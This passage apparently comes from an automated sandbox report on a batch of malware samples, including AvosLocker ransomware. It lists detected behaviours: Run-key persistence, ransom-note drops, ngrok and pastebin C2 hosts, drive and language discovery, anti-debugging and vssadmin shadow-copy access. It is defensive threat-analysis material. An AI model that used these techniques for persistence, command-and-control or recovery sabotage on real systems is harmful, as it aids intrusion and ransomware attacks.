\REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\requirements = "C:\\Users\\Admin\\AppData\\Local\\Temp\\requirements.exe" requirements.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\Onedrive = "\"C:\\Componentperf\\Onedrive.exe\"" componentdll.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\nobody = "\"C:\\Program Files\\Reference Assemblies\\Microsoft\\Framework\\v3.0\\fr\\nobody.exe\"" componentdll.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Roaming\\XClient.exe" XClient.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\dllhost.exe = "\"C:\\ProgramData\\dllhost.exe\" .." dllhost.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Onedrive = "\"C:\\Componentperf\\Onedrive.exe\"" componentdll.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\dllhost.exe = "\"C:\\ProgramData\\dllhost.exe\" .." dllhost.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI AvosLocker.exe -
Enumerates connected drives 3 TTPs 23 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: 22.exe File opened (read-only) \??\L: 22.exe File opened (read-only) \??\P: 22.exe File opened (read-only) \??\Q: 22.exe File opened (read-only) \??\S: 22.exe File opened (read-only) \??\T: 22.exe File opened (read-only) \??\X: 22.exe File opened (read-only) \??\G: 22.exe File opened (read-only) \??\E: 22.exe File opened (read-only) \??\I: 22.exe File opened (read-only) \??\O: 22.exe File opened (read-only) \??\R: 22.exe File opened (read-only) \??\U: 22.exe File opened (read-only) \??\V: 22.exe File opened (read-only) \??\Z: 22.exe File opened (read-only) \??\B: 22.exe File opened (read-only) \??\N: 22.exe File opened (read-only) \??\W: 22.exe File opened (read-only) \??\M: 22.exe File opened (read-only) \??\K: 22.exe File opened (read-only) \??\Y: 22.exe File opened (read-only) \??\Z: AvosLocker.exe File opened (read-only) \??\H: 22.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 64 IoCs
flow ioc 744 pastebin.com 771 pastebin.com 680 pastebin.com 699 pastebin.com 183 raw.githubusercontent.com 665 pastebin.com 651 raw.githubusercontent.com 1003 pastebin.com 67 raw.githubusercontent.com 686 raw.githubusercontent.com 723 pastebin.com 734 pastebin.com 1138 raw.githubusercontent.com 1499 raw.githubusercontent.com 277 4.tcp.us-cal-1.ngrok.io 708 pastebin.com 127 4.tcp.us-cal-1.ngrok.io 342 8.tcp.ngrok.io 91 raw.githubusercontent.com 1548 8.tcp.ngrok.io 727 pastebin.com 893 pastebin.com 1047 pastebin.com 1287 pastebin.com 165 4.tcp.us-cal-1.ngrok.io 493 2.tcp.ngrok.io 73 raw.githubusercontent.com 308 raw.githubusercontent.com 456 4.tcp.us-cal-1.ngrok.io 762 pastebin.com 912 pastebin.com 921 pastebin.com 13 raw.githubusercontent.com 54 raw.githubusercontent.com 976 pastebin.com 1257 pastebin.com 869 pastebin.com 1061 pastebin.com 1232 raw.githubusercontent.com 655 pastebin.com 787 pastebin.com 863 pastebin.com 904 pastebin.com 931 pastebin.com 1103 pastebin.com 1110 raw.githubusercontent.com 1112 pastebin.com 12 raw.githubusercontent.com 643 8.tcp.ngrok.io 1338 2.tcp.ngrok.io 1459 raw.githubusercontent.com 1141 raw.githubusercontent.com 1305 pastebin.com 120 raw.githubusercontent.com 888 pastebin.com 879 pastebin.com 939 pastebin.com 982 pastebin.com 991 pastebin.com 1000 pastebin.com 1011 pastebin.com 538 raw.githubusercontent.com 703 4.tcp.us-cal-1.ngrok.io 1055 pastebin.com -
Looks up external IP address via web service 10 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 1437 ip-api.com 1540 ip-api.com 137 ip-api.com 247 ip-api.com 378 ip-api.com 778 api.ipify.org 1254 ip-api.com 16 ip-api.com 779 api.ipify.org 807 ip-api.com -
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
-
Drops autorun.inf file 1 TTPs 4 IoCs
Malware can abuse Windows Autorun to spread further via attached volumes.
description ioc Process File created C:\autorun.inf server.exe File opened for modification C:\autorun.inf server.exe File created F:\autorun.inf server.exe File opened for modification F:\autorun.inf server.exe -
Drops file in System32 directory 15 IoCs
description ioc Process File opened for modification C:\Windows\system32\SubDir main-pc.exe File opened for modification C:\Windows\SysWOW64\Dock.exe server.exe File opened for modification C:\Windows\system32\SubDir discord.exe File created C:\Windows\SysWOW64\Dock.exe server.exe File opened for modification C:\Windows\SysWOW64\Dock.exe server.exe File opened for modification C:\Windows\SysWOW64\Dock.exe server.exe File created C:\Windows\system32\SubDir\main-pc.exe discord.exe File opened for modification C:\Windows\SysWOW64\Dock.exe server.exe File opened for modification C:\Windows\SysWOW64\Dock.exe server.exe File created \??\c:\Windows\System32\qrosn9.exe csc.exe File opened for modification C:\Windows\system32\SubDir\main-pc.exe discord.exe File opened for modification C:\Windows\system32\SubDir\main-pc.exe main-pc.exe File opened for modification C:\Windows\SysWOW64\Dock.exe server.exe File opened for modification C:\Windows\SysWOW64\Dock.exe server.exe File created \??\c:\Windows\System32\CSC712E14D9CECF4FF9B0E6885FEF66F1BD.TMP csc.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4664 lkyhjksefa.exe 4664 lkyhjksefa.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1404 set thread context of 2092 1404 CFXBypass.exe 107 -
resource yara_rule behavioral1/files/0x000300000002166b-30871.dat upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui AvosLocker.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\RSSFeeds.Gadget\fr-FR\GET_YOUR_FILES_BACK.txt AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\CommonData\AlertImage_High.jpg AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR10F.GIF AvosLocker.exe File created C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Desert\GET_YOUR_FILES_BACK.txt AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00351_.WMF AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152898.WMF AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\QuickStyles\Classic.dotx AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21520_.GIF AvosLocker.exe File created C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\ja-JP\GET_YOUR_FILES_BACK.txt AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\LoginForm.zip AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\FLYERHM.POC AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115867.GIF AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PRRTINST.WMF AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveProjectToolset\TABMASK.BMP AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0292982.WMF AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0384888.JPG AvosLocker.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\COMPASS\THMBNAIL.PNG AvosLocker.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\it-IT\css\GET_YOUR_FILES_BACK.txt AvosLocker.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\docked_black_moon-first-quarter_partly-cloudy.png AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\bg_SlateBlue.gif AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107748.WMF AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0178348.JPG AvosLocker.exe File created C:\Program Files (x86)\Common Files\microsoft shared\MSClientDataMgr\GET_YOUR_FILES_BACK.txt AvosLocker.exe File opened for modification C:\Program Files\Windows NT\Accessories\ja-JP\wordpad.exe.mui AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR46B.GIF AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\LINES\BD14516_.GIF AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01628_.WMF AvosLocker.exe File created C:\Program Files\Windows NT\Accessories\ja-JP\GET_YOUR_FILES_BACK.txt AvosLocker.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\it-IT\js\GET_YOUR_FILES_BACK.txt AvosLocker.exe File created C:\Program Files (x86)\Windows NT\Accessories\GET_YOUR_FILES_BACK.txt AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Sts2.css AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME16.CSS AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\J0115842.GIF AvosLocker.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\EDGE\EDGE.INF AvosLocker.exe File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\images\dialdot.png AvosLocker.exe File opened for modification C:\Program Files (x86)\Windows Media Player\ja-JP\wmpnssui.dll.mui AvosLocker.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\logo.png AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182888.WMF AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\ROAD_01.MID AvosLocker.exe File created C:\Program Files (x86)\Common Files\System\Ole DB\de-DE\GET_YOUR_FILES_BACK.txt AvosLocker.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can.hyp AvosLocker.exe File opened for modification C:\Program Files\Windows Mail\es-ES\msoeres.dll.mui AvosLocker.exe File created C:\Program Files\VideoLAN\VLC\locale\tt\GET_YOUR_FILES_BACK.txt AvosLocker.exe File created C:\Program Files\VideoLAN\VLC\locale\sq\GET_YOUR_FILES_BACK.txt AvosLocker.exe File created C:\Program Files (x86)\Windows Defender\ja-JP\GET_YOUR_FILES_BACK.txt AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187851.WMF AvosLocker.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\icon.png AvosLocker.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\images\item_hover_docked.png AvosLocker.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\BTINTERNET.NET.XML AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\Lime\TAB_ON.GIF AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME09.CSS AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Urban.eftx AvosLocker.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\Office Setup Controller\PowerPoint.en-us\PowerPointMUI.XML AvosLocker.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_20_666666_40x40.png AvosLocker.exe File created C:\Program Files (x86)\Windows Sidebar\Gadgets\CPU.Gadget\es-ES\js\GET_YOUR_FILES_BACK.txt AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGCAL.XML AvosLocker.exe File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_color120.png AvosLocker.exe File opened for modification C:\Program Files (x86)\Windows Photo Viewer\de-DE\ImagingDevices.exe.mui AvosLocker.exe File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\Sounds\People\GET_YOUR_FILES_BACK.txt AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Angles.xml AvosLocker.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PARNT_05.MID AvosLocker.exe -
Drops file in Windows directory 11 IoCs
description ioc Process File created \??\c:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe csc.exe File opened for modification C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Free YouTube Downloader.exe FreeYoutubeDownloader.exe File opened for modification C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.exe FreeYoutubeDownloader.exe File created C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Uninstall.ini FreeYoutubeDownloader.exe File created C:\Windows\Client.exe svchost.exe File created C:\Windows\es-ES\conhost.exe componentdll.exe File opened for modification C:\Windows\es-ES\conhost.exe componentdll.exe File created C:\Windows\es-ES\088424020bedd6 componentdll.exe File opened for modification C:\Windows\Free Youtube Downloader\Free Youtube Downloader\Box.exe FreeYoutubeDownloader.exe File created C:\WIndows\svchost.exe Client.exe File created \??\c:\Windows\Free Youtube Downloader\Free Youtube Downloader\CSC15D8739DE7804F76AA2AC131BB12FBFA.TMP csc.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 8064 mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\NetSh netsh.exe -
Program crash 4 IoCs
pid pid_target Process procid_target 2368 2632 WerFault.exe 53 6232 9292 WerFault.exe 797 5728 4568 WerFault.exe 897 12008 11956 WerFault.exe 990 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language update.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language main.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language kthiokadjg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wmfdist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language testme.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CFXBypass.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language joiner.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language hbfgjhhesfd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Destover.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cistest.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language lkyhjksefa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7Installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Steanings.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language OLDxTEAM.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language server.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 22.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language evetbeta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Enigma32g.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Box.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language compiled.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 4363463463464363463463463.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CFXBypass.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language nbothjkd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 51 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 5952 PING.EXE 3400 PING.EXE 3464 PING.EXE 6304 PING.EXE 8832 PING.EXE 4136 PING.EXE 3748 PING.EXE 3376 PING.EXE 3288 PING.EXE 3712 PING.EXE 4992 PING.EXE 4388 PING.EXE 6180 PING.EXE 6116 PING.EXE 3476 PING.EXE 3880 PING.EXE 3752 PING.EXE 3368 PING.EXE 7400 PING.EXE 3456 PING.EXE 4372 PING.EXE 6384 PING.EXE 1672 PING.EXE 448 PING.EXE 3248 PING.EXE 3808 PING.EXE 4332 PING.EXE 4128 PING.EXE 10660 PING.EXE 12700 PING.EXE 112 PING.EXE 3448 PING.EXE 3956 PING.EXE 2012 PING.EXE 5036 PING.EXE 9136 PING.EXE 6720 PING.EXE 8644 PING.EXE 9556 PING.EXE 3356 PING.EXE 3712 PING.EXE 3252 PING.EXE 4484 PING.EXE 976 PING.EXE 3436 PING.EXE 8576 PING.EXE 5604 PING.EXE 3864 PING.EXE 4052 PING.EXE 3644 PING.EXE 4140 PING.EXE -
Delays execution with timeout.exe 3 IoCs
pid Process 3412 timeout.exe 3456 timeout.exe 2864 timeout.exe -
Interacts with shadow copies 3 TTPs 2 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 15088 vssadmin.exe 5964 vssadmin.exe -
Kills process with taskkill 14 IoCs
